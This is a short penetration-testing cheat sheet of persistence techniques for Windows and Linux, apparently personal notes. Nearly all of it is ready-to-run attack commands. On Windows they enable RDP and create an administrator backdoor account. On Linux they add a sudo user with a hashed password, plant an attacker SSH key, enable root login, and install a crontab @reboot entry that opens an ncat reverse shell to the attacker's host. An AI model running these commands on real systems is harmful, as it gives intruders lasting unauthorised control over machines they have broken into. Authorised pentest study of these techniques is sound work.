Persistence

Windows

cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
cmd /c netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
cmd /c net user /add Till P@ssw0rd
cmd /c net localgroup Administrators /Add Till
cmd /c net localgroup "Remote Desktop Users" /Add Till
rdesktop -k de-ch -u 'Till' -p 'P@ssw0rd' {RHOST}

Linux

Add Super User

# Generate you're own PW with: `openssl passwd -crypt 'P@ssw0rd'`
sudo useradd -p wNlg41ZQYB2nQ -s /bin/bash -d /home/till -m -G sudo till

SSH Keys

# If you haven't done so already, prepare your ~/.ssh/id_rsa.pub on Kali:
ssh-keygen

# Generate the command to type into the target:
echo -e "echo '$(cat $HOME/.ssh/id_rsa.pub)' >> ~/.ssh/authorized_keys"

# Absolute Path: /home/{USER}/.ssh/authorized_keys
# Absolute Path: /root/.ssh/authorized_keys

# Maybe: echo 'PermitRootLogin yes' >> /etc/ssh/sshd_config && service sshd restart

# If ~/.ssh/authorized_keys doesn’t exist on target:
mkdir ~/.ssh
chmod 700 ~/.ssh
touch ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chown -R {USER}:{USER} /home/{USER}/.ssh/

# Use the key
ssh -i ~/.ssh/id_rsa {RUSER}@{RHOST}

Crontab

(crontab -l ; echo "@reboot sleep 200 && ncat {LHOST} {LPORT} -e /bin/bash")|crontab 2> /dev/null

PayloadsAllTheThings Linux Persistence

Relevant Note(s): Penetration Testing